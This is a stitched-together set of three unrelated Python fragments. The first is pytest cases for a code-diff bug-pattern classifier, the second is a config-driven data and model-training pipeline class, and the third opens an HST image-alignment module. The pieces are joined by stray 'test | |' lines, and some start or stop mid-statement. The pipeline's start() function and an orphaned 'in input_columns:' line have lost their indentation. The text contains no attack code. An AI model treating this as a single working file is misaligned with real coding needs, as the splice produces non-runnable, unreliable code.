    + test(x, y + 1)
    """
    assert compute_diff_sstub(test) != SStubPattern.SAME_FUNCTION_MORE_ARGS
def test_same_function_more_args_4():
    """Adding an expression argument is SAME_FUNCTION_MORE_ARGS."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test(x)
    + test(x, y + 1)
    """
    assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_MORE_ARGS
def test_same_function_more_args_5():
    """Changing an argument while adding one is NOT SAME_FUNCTION_MORE_ARGS."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test(x + 1)
    + test(x, y + 1)
    """
    assert compute_diff_sstub(test) != SStubPattern.SAME_FUNCTION_MORE_ARGS
def test_same_function_more_args_6():
    """Adding an argument to a method call is SAME_FUNCTION_MORE_ARGS."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test.call(x)
    + test.call(x, y)
    """
    assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_MORE_ARGS
def test_same_function_more_args_7():
    """Adding several arguments at once is SAME_FUNCTION_MORE_ARGS."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test.call(x)
    + test.call(x, y, z, d, a, call())
    """
    assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_MORE_ARGS
def test_same_function_more_args_8():
    """Adding args while renaming the method is NOT SAME_FUNCTION_MORE_ARGS."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test.call1(x)
    + test.call(x, y, z, d, a, call())
    """
    assert compute_diff_sstub(test) != SStubPattern.SAME_FUNCTION_MORE_ARGS
# Same Function less args -------------------------------------------
def test_same_function_less_args_1():
    """Removing the only argument is SAME_FUNCTION_LESS_ARGS."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test(x)
    + test()
    """
    assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_LESS_ARGS
def test_same_function_less_args_2():
    """Dropping the last argument is SAME_FUNCTION_LESS_ARGS."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test(x, y)
    + test(x)
    """
    assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_LESS_ARGS
def test_same_function_less_args_3():
    """Simplifying an argument expression is NOT SAME_FUNCTION_LESS_ARGS."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test(x, y + 1)
    + test(x, y)
    """
    assert compute_diff_sstub(test) != SStubPattern.SAME_FUNCTION_LESS_ARGS
def test_same_function_less_args_4():
    """Dropping an expression argument is SAME_FUNCTION_LESS_ARGS."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test(x, y + 1)
    + test(x)
    """
    assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_LESS_ARGS
def test_same_function_less_args_5():
    """Dropping an arg while changing another is NOT SAME_FUNCTION_LESS_ARGS."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test(x, y + 1)
    + test(x + 1)
    """
    assert compute_diff_sstub(test) != SStubPattern.SAME_FUNCTION_LESS_ARGS
def test_same_function_less_args_6():
    """Dropping an argument from a method call is SAME_FUNCTION_LESS_ARGS."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test.call(x, y)
    + test.call(x)
    """
    assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_LESS_ARGS
def test_same_function_less_args_7():
    """Dropping several arguments at once is SAME_FUNCTION_LESS_ARGS."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test.call(x, y, z, d, a, call())
    + test.call(x)
    """
    assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_LESS_ARGS
# Same Function wrong caller -------------------------------------------
def test_same_function_wrong_caller_1():
    """Renaming the receiver object is SAME_FUNCTION_WRONG_CALLER."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test.call()
    + test1.call()
    """
    assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_WRONG_CALLER
def test_same_function_wrong_caller_2():
    """Renaming a nested attribute is NOT SAME_FUNCTION_WRONG_CALLER."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test.x.call()
    + test.y.call()
    """
    assert compute_diff_sstub(test) != SStubPattern.SAME_FUNCTION_WRONG_CALLER
def test_same_function_wrong_caller_3():
    """Introducing a receiver object is NOT SAME_FUNCTION_WRONG_CALLER."""
    test = """
    @@ -0,0 +0,0 @@ test
    - call()
    + test.call()
    """
    assert compute_diff_sstub(test) != SStubPattern.SAME_FUNCTION_WRONG_CALLER
# Same Function swap args -------------------------------------------
def test_same_function_swap_args_1():
    """Swapping two arguments is SAME_FUNCTION_SWAP_ARGS."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test.call(x, y)
    + test.call(y, x)
    """
    assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_SWAP_ARGS
def test_same_function_swap_args_2():
    """Swapping args while renaming the method is NOT SAME_FUNCTION_SWAP_ARGS."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test.call1(x, y)
    + test.call(y, x)
    """
    assert compute_diff_sstub(test) != SStubPattern.SAME_FUNCTION_SWAP_ARGS
def test_same_function_swap_args_3():
    """Swapping two of three arguments is SAME_FUNCTION_SWAP_ARGS."""
    test = """
    @@ -0,0 +0,0 @@ test
    - test.call(x, y, z)
    + test.call(y, x, z)
    """
    assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_SWAP_ARGS
def test_same_function_swap_args_auto():
    """Every nontrivial permutation of call args is SAME_FUNCTION_SWAP_ARGS."""
    import itertools
    args = ["a", "b", "c", "d + 1", "0 if a != 0 else 1"]
    # try argument lists of increasing length and all their permutations
    for l in range(2, len(args)):
        perm = tuple(args[:l])
        for p in itertools.permutations(perm):
            if p == perm: continue  # identity permutation is not a swap
            test = """
    @@ -0,0 +0,0 @@ test
    - test.call(%s)
    + test.call(%s)
    """ % (", ".join(perm), ", ".join(p))
            assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_SWAP_ARGS
# Add function around expression -------------------------------------------
def test_add_function_around_expression_1():
    """Wrapping a variable in a call is ADD_FUNCTION_AROUND_EXPRESSION."""
    test = """
    @@ -0,0 +0,0 @@ test
    - result = x
    + result = int(x)
    """
    assert compute_diff_sstub(test) == SStubPattern.ADD_FUNCTION_AROUND_EXPRESSION
def test_add_function_around_expression_2():
    """Wrapping a subexpression is ADD_FUNCTION_AROUND_EXPRESSION."""
    test = """
    @@ -0,0 +0,0 @@ test
    - result = x + 1
    + result = int(x) + 1
    """
    assert compute_diff_sstub(test) == SStubPattern.ADD_FUNCTION_AROUND_EXPRESSION
def test_add_function_around_expression_3():
    """Wrapping the whole expression is ADD_FUNCTION_AROUND_EXPRESSION."""
    test = """
    @@ -0,0 +0,0 @@ test
    - result = x + 1
    + result = int(x + 1)
    """
    assert compute_diff_sstub(test) == SStubPattern.ADD_FUNCTION_AROUND_EXPRESSION
# Add method call --------------------------------------------------------
def test_add_method_call_1():
    """Appending a method call to a variable is ADD_METHOD_CALL."""
    test = """
    @@ -0,0 +0,0 @@ test
    - result = x
    + result = x.get()
    """
    assert compute_diff_sstub(test) == SStubPattern.ADD_METHOD_CALL
def test_add_method_call_2():
    """Chaining an extra call onto a call is ADD_METHOD_CALL."""
    test = """
    @@ -0,0 +0,0 @@ test
    - result = x.get()
    + result = x.get().return()
    """
    assert compute_diff_sstub(test) == SStubPattern.ADD_METHOD_CALL
def test_add_method_call_3():
    """Appending a method call to an attribute is ADD_METHOD_CALL."""
    test = """
    @@ -0,0 +0,0 @@ test
    - result = x.y
    + result = x.y.get()
    """
    assert compute_diff_sstub(test) == SStubPattern.ADD_METHOD_CALL
def test_add_method_call_4():
    """Inserting a call in the middle of a chain is ADD_METHOD_CALL."""
    test = """
    @@ -0,0 +0,0 @@ test
    - result = x.get()
    + result = x.return().get()
    """
    assert compute_diff_sstub(test) == SStubPattern.ADD_METHOD_CALL
def test_add_method_call_5():
    """Inserting a plain attribute (no call) is NOT ADD_METHOD_CALL."""
    test = """
    @@ -0,0 +0,0 @@ test
    - result = x.get()
    + result = x.return.get()
    """
    assert compute_diff_sstub(test) != SStubPattern.ADD_METHOD_CALL
def test_add_method_call_6():
    """Removing a call from a chain is NOT ADD_METHOD_CALL."""
    test = """
    @@ -0,0 +0,0 @@ test
    - result = x.return().get()
    + result = x.get()
    """
    assert compute_diff_sstub(test) != SStubPattern.ADD_METHOD_CALL
# Change identifier --------------------------------------------------------
def test_change_identifier_used_1():
    """Substituting one variable for another is CHANGE_IDENTIFIER_USED."""
    test = """
    @@ -0,0 +0,0 @@ test
    - result = x
    + result = y
    """
    assert compute_diff_sstub(test) == SStubPattern.CHANGE_IDENTIFIER_USED
def test_change_identifier_used_2():
    """Changing a keyword argument's value identifier is CHANGE_IDENTIFIER_USED."""
    test = """
    @@ -0,0 +0,0 @@ test
    - result = test(path = path)
    + result = test(path = path2)
    """
    assert compute_diff_sstub(test) == SStubPattern.CHANGE_IDENTIFIER_USED
def test_change_identifier_used_2b():
    """Renaming a keyword-argument NAME is NOT CHANGE_IDENTIFIER_USED.

    FIX: this function was a second definition of
    ``test_change_identifier_used_2``; the duplicate name shadowed the
    earlier test so pytest never collected or ran it. Renamed so both
    cases execute.
    """
    test = """
    @@ -0,0 +0,0 @@ test
    - result = test(path = path)
    + result = test(path2 = path)
    """
    assert compute_diff_sstub(test) != SStubPattern.CHANGE_IDENTIFIER_USED
def test_change_identifier_used_3():
    """Renaming the called function is NOT CHANGE_IDENTIFIER_USED."""
    test = """
    @@ -0,0 +0,0 @@ test
    - result = test(path = path)
    + result = test2(path = path)
    """
    assert compute_diff_sstub(test) != SStubPattern.CHANGE_IDENTIFIER_USED
def test_change_identifier_used_4():
    """Renaming a method-call receiver is NOT CHANGE_IDENTIFIER_USED."""
    test = """
    @@ -0,0 +0,0 @@ test
    - result = test.x(a, b, c)
    + result = test1.x(a, b, c)
    """
    assert compute_diff_sstub(test) != SStubPattern.CHANGE_IDENTIFIER_USED
def test_change_identifier_used_5():
    """Renaming the assignment target is CHANGE_IDENTIFIER_USED."""
    test = """
    @@ -0,0 +0,0 @@ test
    - result = test.x(a, b, c)
    + result1 = test.x(a, b, c)
    """
    assert compute_diff_sstub(test) == SStubPattern.CHANGE_IDENTIFIER_USED
# Change numeric literal ----------------------------------------------------
def test_change_numeric_literal_1():
    """Changing an integer literal is CHANGE_NUMERIC_LITERAL."""
    test = """
    @@ -0,0 +0,0 @@ test
    - result = 0
    + result = 1
    """
    assert compute_diff_sstub(test) == SStubPattern.CHANGE_NUMERIC_LITERAL
def test_change_numeric_literal_2():
    """Changing a literal inside an expression is CHANGE_NUMERIC_LITERAL."""
    test = """
    @@ -0,0 +0,0 @@ test
    - result = x + 1
    + result = x + 5
    """
    assert compute_diff_sstub(test) == SStubPattern.CHANGE_NUMERIC_LITERAL
def test_change_numeric_literal_3():
    """Changing an int to a different float is CHANGE_NUMERIC_LITERAL."""
    test = """
    @@ -0,0 +0,0 @@ test
    - result = x + 1
    + result = x + 5.0
    """
    assert compute_diff_sstub(test) == SStubPattern.CHANGE_NUMERIC_LITERAL
def test_change_numeric_literal_4():
    """1 -> 1.0 (same numeric value) is NOT CHANGE_NUMERIC_LITERAL."""
    test = """
    @@ -0,0 +0,0 @@ test
    - result = x + 1
    + result = x + 1.0
    """
    assert compute_diff_sstub(test) != SStubPattern.CHANGE_NUMERIC_LITERAL
def test_change_numeric_literal_5():
    """Replacing a literal with an identifier is NOT CHANGE_NUMERIC_LITERAL."""
    test = """
    @@ -0,0 +0,0 @@ test
    - result = x + 1
    + result = x + a
    """
    assert compute_diff_sstub(test) != SStubPattern.CHANGE_NUMERIC_LITERAL
# Change boolean literal ----------------------------------------------------
def test_change_boolean_literal_1():
    """Flipping True -> False in a condition is CHANGE_BOOLEAN_LITERAL."""
    test = """
    @@ -0,0 +0,0 @@ test
    - if True:
    + if False:
        pass
    """
    assert compute_diff_sstub(test) == SStubPattern.CHANGE_BOOLEAN_LITERAL
def test_change_boolean_literal_2():
    """Flipping a boolean inside a compound condition is CHANGE_BOOLEAN_LITERAL."""
    test = """
    @@ -0,0 +0,0 @@ test
    - if True and x < 0:
    + if False and x < 0:
        pass
    """
    assert compute_diff_sstub(test) == SStubPattern.CHANGE_BOOLEAN_LITERAL
def test_change_boolean_literal_3():
    """Flipping False -> True is CHANGE_BOOLEAN_LITERAL."""
    test = """
    @@ -0,0 +0,0 @@ test
    - if False and x < 0:
    + if True and x < 0:
        pass
    """
    assert compute_diff_sstub(test) == SStubPattern.CHANGE_BOOLEAN_LITERAL
def test_change_boolean_literal_4():
    """Replacing a boolean with a comparison is NOT CHANGE_BOOLEAN_LITERAL."""
    test = """
    @@ -0,0 +0,0 @@ test
    - if False and x < 0:
    + if x / 2 == 0 and x < 0:
        pass
    """
    assert compute_diff_sstub(test) != SStubPattern.CHANGE_BOOLEAN_LITERAL
# Change unary operator ----------------------------------------------------
def test_change_unary_operator_1():
test | |
in input_columns:
if name in group_udf_mapping:
strategies_dict[input_column] = group_udf_mapping[name]
else:
strategies_dict[input_column] = load_udf(name, self.parse_params(strategy, name)).process
return strategies_dict
def process_strategy(self, mdf, strategy, strategy_names=None):
    '''
    Apply one UDF/strategy step to the data.

    :param mdf: input data (an MDataFrame wrapper)
    :param strategy: UDF configuration dict for this step
    :param strategy_names: UDF name(s); the name may be supplied here or
        via ``strategy["name"]``
    :return: the resulting output column names, or None for built-in
        terminal steps (Output, GroupAuc, column utilities)
    '''
    names = strategy_names if strategy_names is not None else strategy["name"]
    # -- built-in steps handled inline, each returns None ------------------
    if names == "Output":
        self.save_file(mdf.data, strategy)
        return None
    if names == "GroupAuc":
        # compute per-key grouped AUC and log it
        df = mdf.datas()
        key_columns = strategy["key_columns"]
        key_data = df[key_columns[0]].tolist() if len(key_columns) == 1 else [tuple(x) for x in df[key_columns].values]
        group_auc, detail_auc = mmodel.cal_group_auc(df['label'].tolist(), df['pred_prob'].tolist(), key_data)
        logger.info(f'group_auc = {group_auc}')
        if strategy["detail"]:
            logger.info(f'detail_auc : ')
            for key, auc in detail_auc.items():
                logger.info(f'key = {key}, auc = {auc}')
        return None
    elif names == "RenameColumn":
        # rename input_columns -> output_columns pairwise
        input_columns = strategy["input_columns"]
        output_columns = strategy["output_columns"]
        columns_dict = {}
        for index, input in enumerate(input_columns):
            columns_dict[input] = output_columns[index]
        mdf.rename(columns_dict)
        return None
    elif names == "CopyColumn":
        input_columns = strategy["input_columns"]
        output_columns = strategy["output_columns"]
        mdf.copy_column(input_columns, output_columns)
        return None
    elif names == "AddColumn":
        # add constant-valued column(s)
        input_columns = strategy["input_columns"]
        value = strategy['value']
        mdf.add_column(input_columns, value)
        return None
    elif names == "DropColumn":
        mdf.drop(strategy["input_columns"])
        return None
    elif names == "OrderColumn":
        columns = strategy["input_columns"]
        if isinstance(columns, str) and "," in columns:
            columns = columns.split(",")
            columns = [column.strip() for column in columns]
        # prepend key columns so they always come first
        key_column = [column for column in mdf.columns() if column.startswith('keys_') and column not in columns]
        if len(key_column) > 0:
            key_column.extend(columns)
            columns = key_column
        mdf.order_column(columns)
        return None
    # -- generic UDF execution --------------------------------------------
    input_columns = copy.deepcopy(strategy["input_columns"])
    if isinstance(input_columns, dict):
        # input_columns may itself be a nested strategy whose outputs feed this one
        logger.debug("****** parse sub strategy *******")
        input_columns = self.process_strategy(mdf, input_columns)
    output_columns = copy.deepcopy(input_columns) if "output_columns" not in strategy else copy.deepcopy(strategy[
        "output_columns"])
    split_column_count = 0 if "split_column_count" not in strategy else strategy["split_column_count"]
    suffix_use_label = False if "suffix_use_label" not in strategy else strategy["suffix_use_label"]
    if suffix_use_label and "labels" in strategy:
        # expand each output column into one column per label (+ default)
        labels = copy.deepcopy(strategy["labels"])
        default_label = 'others' if 'default_label' not in strategy else strategy['default_label']
        labels.append(default_label)
        for index, output_column in enumerate(output_columns):
            pre = output_column if not isinstance(output_column, list) else output_column[0]
            output_columns[index] = [pre + '_' + str(label) for label in labels]
    elif split_column_count > 1:
        # expand each output column into numbered split columns
        for index, output_column in enumerate(output_columns):
            pre = output_column if not isinstance(output_column, list) else output_column[0]
            output_columns[index] = [pre + '_' + str(i) for i in range(split_column_count)]
    # optional prefix/suffix decoration of output column names
    prefix = "" if "output_columns_prefix" not in strategy else strategy["output_columns_prefix"]
    suffix = "" if "output_columns_suffix" not in strategy else strategy["output_columns_suffix"]
    for index, output_column in enumerate(output_columns):
        output_columns[index] = prefix + output_column + suffix if not isinstance(output_column, list) \
            else [prefix + column + suffix for column in output_column]
    keep_input_columns = False if "keep_input_columns" not in strategy else strategy["keep_input_columns"]
    names = names if isinstance(names, list) else [names]
    logger.debug("********* start to execute strategy " + str(names) + " **********")
    logger.debug("input_columns: " + str(input_columns))
    logger.debug("output_columns: " + str(output_columns))
    start = time.time()
    # run each named UDF in sequence over the same input/output columns
    for name in names:
        udf = load_udf(name, self.parse_params(strategy, name))
        mdf.process_udf(udf, input_columns, output_columns, keep_input_columns)
    if "drop_columns" in strategy:
        mdf.drop(strategy["drop_columns"])
    if "select_columns" in strategy:
        mdf.select(strategy["select_columns"])
    logger.debug(mdf)
    logger.debug(mdf.columns())
    cost = time.time() - start
    logger.debug("********* stop to execute strategy " + str(names) + " cost = " + str(cost) + " **********")
    return output_columns
def process_model(self, df):
    '''
    Model stage: train / test / predict according to the 'model' section
    of the pipeline config.

    :param df: input feature DataFrame (consumed; 'keys_'-prefixed columns
        are treated as group keys, not features)
    :return: None -- results are written via strategies/Output configs
    '''
    if 'model' not in self.config:
        logger.info("no model in json, ignore model process")
        return
    gc.collect()
    config = self.config['model']
    columns = df.columns.values.tolist()
    logger.info("********* start process mode ********")
    logger.debug(columns)
    logger.debug(df)
    run_mod = 'train_test' if "run_mode" not in config else config["run_mode"]
    # collect model_<N> entries and run them in numeric-suffix order
    models = []
    for key, model in config.items():
        if key.startswith("model_"):
            models.append((key[6:], model))
    models.sort()
    logger.debug(models)
    if run_mod == "predict":
        # inference only: load saved models and score the full frame
        model_select = 'ModelSelect' if "model_select" not in config else config["model_select"]
        group_keys = [column for column in columns if column.startswith('keys_')]
        group_key_df = df[group_keys]
        df.drop(group_keys, axis=1, inplace=True)
        for _, model in models:
            logger.debug(model)
            if "model_path" not in model:
                raise Exception("model_path could not be null!")
            model_path = model["model_path"]
            model_process = ModelProcess()
            model_process.load_model(model_path=model_path)
            pred_df = model_process.predict(df)
            # re-attach group keys (with the 'keys_' prefix stripped)
            group_key_df.columns = [key[5:] for key in group_keys]
            df_temp = pd.concat([group_key_df, pred_df], axis=1, sort=False)
            if 'strategies' in model:
                strategies = model['strategies']
                mdf = MDataFrame(df_temp)
                for strategy in strategies:
                    self.process_strategy(mdf, strategy)
                df_temp = mdf.datas()
            if 'Output' in model:
                self.save_file(df_temp, model['Output'])
    elif run_mod == "train":
        # train on a train/validation split; no holdout evaluation
        group_keys = [column for column in columns if column.startswith('keys_')]
        df.drop(group_keys, axis=1, inplace=True)
        # clamp validation fraction to [0.01, 0.5], defaulting to 0.2
        validation_data_percent = 0.2 if "validation_data_percent" not in config else config[
            "validation_data_percent"]
        validation_data_percent = 0.2 if validation_data_percent > 0.5 or validation_data_percent < 0.01 else validation_data_percent
        x_df, y_df = dataprocess.split_feature_and_label_df(df)
        del df
        train_x_df, valid_x_df, train_y_df, valid_y_df = train_test_split(x_df, y_df,
            test_size=validation_data_percent, random_state=0)
        del x_df, y_df
        for _, model in models:
            logger.debug(model)
            model_type = model["model_type"]
            model_config = model["model_config"]
            model_process = ModelProcess(model_type, model_config)
            model_process.train_model(train_x_df, train_y_df, test_x=valid_x_df, test_y=valid_y_df)
            model_process.save_model(model["model_path"])
            logger.info("model saved to " + os.path.abspath(model["model_path"]))
            if 'feature_importance' in model:
                # print normalized feature importances, most important first
                feature_importance = model['feature_importance']
                importance_types = ['gain'] if 'importance_type' not in feature_importance else feature_importance['importance_type']
                for importance_type in importance_types:
                    score = model_process.feature_importance(importance_type)
                    all_features = [score.get(f, 0.) for f in model_process.features()]
                    all_features = np.array(all_features, dtype=np.float32)
                    all_features_sum = all_features.sum()
                    importance_list = [[f, score.get(f, 0.) / all_features_sum] for f in model_process.features()]
                    importance_list.sort(key=lambda elem: elem[1], reverse=True)
                    print("feature importance: " + importance_type)
                    for index, item in enumerate(importance_list):
                        print(index, item[0], item[1])
    elif run_mod == "test":
        # evaluate previously saved models on the full labeled frame
        group_keys = [column for column in columns if column.startswith('keys_')]
        group_key_df = df[group_keys]
        df.drop(group_keys, axis=1, inplace=True)
        x_df, y_df = dataprocess.split_feature_and_label_df(df)
        del df
        for _, model in models:
            logger.debug(model)
            if "model_path" not in model:
                raise Exception("model_path could not be null!")
            model_process = ModelProcess()
            model_process.load_model(model_path=model["model_path"])
            pred_df = model_process.evaluate_model(x_df, y_df, ana_top=0.05)
            group_key_df.columns = [key[5:] for key in group_keys]
            df_temp = pd.concat([group_key_df, y_df, pred_df], axis=1, sort=False)
            if 'strategies' in model:
                strategies = model['strategies']
                mdf = MDataFrame(df_temp)
                for strategy in strategies:
                    self.process_strategy(mdf, strategy)
                df_temp = mdf.datas()
            if 'Output' in model:
                self.save_file(df_temp, model['Output'])
    elif run_mod == "train_test":
        # train on train/validation split, then evaluate on a holdout set
        group_keys = [column for column in columns if column.startswith('keys_')]
        group_key_df = df[group_keys]
        df.drop(group_keys, axis=1, inplace=True)
        # clamp test and validation fractions to [0.01, 0.5], default 0.2
        test_data_percent = 0.2 if "test_data_percent" not in config else config["test_data_percent"]
        test_data_percent = 0.2 if test_data_percent > 0.5 or test_data_percent < 0.01 else test_data_percent
        validation_data_percent = 0.2 if "validation_data_percent" not in config else config["validation_data_percent"]
        validation_data_percent = 0.2 if validation_data_percent > 0.5 or validation_data_percent < 0.01 else validation_data_percent
        x_df, y_df = dataprocess.split_feature_and_label_df(df)
        del df
        train_x_df, test_x_df, train_y_df, test_y_df = train_test_split(x_df, y_df, test_size=test_data_percent, random_state=0)
        del x_df, y_df
        train_x_df, valid_x_df, train_y_df, valid_y_df = train_test_split(train_x_df, train_y_df, test_size=validation_data_percent, random_state=0)
        for _, model in models:
            logger.debug(model)
            model_process = ModelProcess(model["model_type"], model["model_config"])
            model_process.train_model(train_x_df, train_y_df, test_x=valid_x_df, test_y=valid_y_df)
            model_process.save_model(model["model_path"])
            logger.info("model saved to " + os.path.abspath(model["model_path"]))
            pred_df = model_process.evaluate_model(test_x_df, test_y_df, ana_top=0.05)
            group_key_df.columns = [key[5:] for key in group_keys]
            df_temp = pd.concat([group_key_df, test_y_df, pred_df], axis=1, sort=False)
            if 'strategies' in model:
                strategies = model['strategies']
                mdf = MDataFrame(df_temp)
                for strategy in strategies:
                    self.process_strategy(mdf, strategy)
                df_temp = mdf.datas()
            if 'Output' in model:
                self.save_file(df_temp, model['Output'])
def save_file(self, src_df, strategy):
    '''
    Persist or emit a result DataFrame according to an output strategy.

    :param src_df: result data (not modified; a deep copy is written)
    :param strategy: output config dict; recognized keys: path, type
        ('text'/'excel'), field_delimiter, columns, header
    :return: None
    '''
    df = src_df.copy(deep=True)
    columns = df.columns.values.tolist()
    key_columns = [column for column in columns if column.startswith('keys_')]
    if len(key_columns) > 0:
        # strip the 'keys_' prefix, dropping any clashing original columns first
        group_keys = {column: column[5:] for column in key_columns}
        df.drop([column[5:] for column in key_columns if column[5:] in columns], axis=1, inplace=True)
        df.rename(columns=group_keys, inplace=True)
    path = 'pipeline.txt' if 'path' not in strategy else strategy['path']
    # FIX: renamed local `type` -> `out_type`; it shadowed the builtin
    out_type = 'text' if 'type' not in strategy else strategy['type']
    if path == "stdout":
        field_delimiter = ',' if 'field_delimiter' not in strategy else strategy['field_delimiter']
        columns = None if 'columns' not in strategy else strategy['columns']
        if columns:
            df = df[[column for column in columns]]
        source.stdout(df, field_delimiter)
    elif out_type == 'text':
        field_delimiter = ',' if 'field_delimiter' not in strategy else strategy['field_delimiter']
        columns = None if 'columns' not in strategy else strategy['columns']
        # write the header only on the first batch (unless overridden)
        header = False if self.current_batch_index > 1 else True if 'header' not in strategy else strategy['header']
        # a trailing '/' means "directory": generate a timestamped filename
        path = path if not path.endswith("/") else path + time.strftime("%Y%m%d%H%M%S", time.localtime()) + ".txt"
        filepath, _ = os.path.split(path)
        if not os.path.exists(filepath):
            os.makedirs(filepath)
        df.to_csv(path, sep=field_delimiter, columns=columns, header=header, mode='a+')
    elif out_type == "excel":
        # FIX: to_excel() was called with no arguments, which raises
        # TypeError -- DataFrame.to_excel requires a target (excel_writer)
        df.to_excel(path)
    else:
        logger.info("we will support type " + out_type + " later")
def start(config_path, **xxkwargs):
start0 = time.time()
pipeline = Pipeline(config_path, **xxkwargs)
logger.info("read and parse config cost = " + str(time.time() - start0))
start1 = time.time()
df = pipeline.read_data()
if df is not None:
logger.info("read data cost = " + str(time.time() - start1))
logger.debug(df)
start1 = time.time()
df = pipeline.process_data(df)
logger.info("process data cost = " + str(time.time() - start1))
else:
start1 = time.time()
df = | |
# <gh_stars>1-10
"""
Align direct images & make mosaics
"""
import os
from collections import OrderedDict
import glob
import numpy as np
import matplotlib.pyplot as plt
# conda install shapely
# from shapely.geometry.polygon import Polygon
import astropy.io.fits as pyfits
import astropy.wcs as pywcs
import astropy.units as u
import astropy.coordinates as coord
from astropy.table import Table
from . import utils
from . import model
from . import GRIZLI_PATH
def check_status():
    """Verify that the calibration reference directories and files are in place.

    Checks each required reference-directory environment variable (currently
    only ``$iref`` for WFC3) and prints setup instructions when something is
    missing.  Nothing is returned; all output goes to stdout.
    """
    for env_key in ['iref']:
        ref_path = os.getenv(env_key)
        if not ref_path:
            print("""
No ${0} set! Make a directory and point to it in ~/.bashrc or ~/.cshrc.
For example,
$ mkdir $GRIZLI/{0}
$ export {0}="$GRIZLI/{0}/" # put this in ~/.bashrc
""".format(env_key))
            continue

        # WFC3: downstream string substitution assumes a trailing slash
        if not ref_path.endswith('/'):
            print("Warning: $iref should end with a '/' character [{0}]".format(ref_path))

        # Probe for one known calibration file to see if calibs were fetched
        test_file = 'iref$uc72113oi_pfl.fits'.replace('iref$', ref_path)
        if not os.path.exists(test_file):
            print("""
HST calibrations not found in $iref [{0}]
To fetch them, run
>>> import grizli.utils
>>> grizli.utils.fetch_default_calibs()
""".format(ref_path))


# Run the environment check once at import time
check_status()
def go_all():
    """Build ASN association tables for every exposure group in 'files.info'.

    TBD
    """
    from stsci.tools import asnutil

    info = Table.read('files.info', format='ascii.commented_header')

    # Downstream parsing expects lower-case column names
    rename_map = {col: col.lower() for col in info.colnames if not col.islower()}
    for old_name, new_name in rename_map.items():
        info.rename_column(old_name, new_name)

    output_list, filter_list = utils.parse_flt_files(info=info, uniquename=False)

    # One ASN table per output product
    for product in output_list:
        exposure_files = output_list[product]
        asn = asnutil.ASNTable(exposure_files, output=product)
        asn.create()
        asn.write()
def fresh_flt_file(file, preserve_dq=False, path='../RAW/', verbose=True, extra_badpix=True, apply_grism_skysub=True, crclean=False, mask_regions=True):
    """Copy a "fresh" unmodified version of a data file from a central location.

    The raw exposure is re-read from `path`, grism exposures are divided by
    the appropriate imaging flat, extra bad-pixel / persistence-style masks
    are applied, and the result is written to the working directory.

    Parameters
    ----------
    file : str
        Filename (optionally with a leading path) of the exposure to refresh.

    preserve_dq : bool
        Preserve the DQ array of the file if it already exists in './'.

    path : str
        Path where to find the "fresh" files.

    verbose : bool
        Print information about what's being done.

    extra_badpix : bool
        Apply extra bad pixel mask. Currently this is hard-coded to look for
        a file "badpix_spars200_Nov9.fits" in the directory specified by
        the `$iref` environment variable. The file can be downloaded from
        https://github.com/gbrammer/wfc3/tree/master/data

    apply_grism_skysub : bool
        Currently unused (placeholder for grism sky subtraction).

    crclean : bool
        Run LACosmic cosmic-ray rejection on the SCI extensions and flag
        hits in DQ (requires the `lacosmicx` package).

    mask_regions : bool
        Apply DS9 region masks found alongside the file via
        `apply_region_mask`.

    Returns
    -------
    Nothing, but copies the file from `path` to `./`.
    """
    import shutil

    local_file = os.path.basename(file)

    # Optionally remember the DQ array of a previously processed local copy.
    # BUGFIX: the original set `orig_dq` in one branch but `dq = None` in the
    # other and then tested `dq`, raising NameError when preserve_dq=True and
    # never re-applying the preserved DQ.  Use one variable consistently.
    if preserve_dq and os.path.exists(local_file):
        im = pyfits.open(local_file)
        orig_dq = im['DQ'].data
    else:
        orig_dq = None

    if file == local_file:
        # Bare filename: find the fresh copy under `path`
        orig_file = pyfits.open(glob.glob(os.path.join(path, file)+'*')[0])
    else:
        orig_file = pyfits.open(file)

    if orig_dq is not None:
        orig_file['DQ'] = orig_dq

    head = orig_file[0].header

    # Divide grism images by imaging flats
    # G102 -> F105W, uc72113oi_pfl.fits
    # G141 -> F140W, uc72113oi_pfl.fits
    flat, extra_msg = 1., ''
    filter = utils.get_hst_filter(head)

    # Copy calibs for ACS/UVIS files
    if '_flc' in file:
        ftpdir = 'https://hst-crds.stsci.edu/unchecked_get/references/hst/'
        calib_types = ['IDCTAB', 'NPOLFILE', 'D2IMFILE']
        if filter == 'G800L':
            calib_types.append('PFLTFILE')

        utils.fetch_hst_calibs(orig_file.filename(), ftpdir=ftpdir,
                               calib_types=calib_types,
                               verbose=False)

    if filter in ['G102', 'G141']:
        flat_files = {'G102': 'uc72113oi_pfl.fits',
                      'G141': 'uc721143i_pfl.fits'}
        flat_file = flat_files[filter]
        extra_msg = ' / flat: {0}'.format(flat_file)

        flat_im = pyfits.open(os.path.join(os.getenv('iref'), flat_file))
        # Trim the 5-pixel reference border of the WFC3/IR flat
        flat = flat_im['SCI'].data[5:-5, 5:-5]
        flat_dq = (flat < 0.2)

        # Grism FLT from IR amplifier gain
        pfl_file = orig_file[0].header['PFLTFILE'].replace('iref$',
                                                           os.getenv('iref'))
        grism_pfl = pyfits.open(pfl_file)[1].data[5:-5, 5:-5]

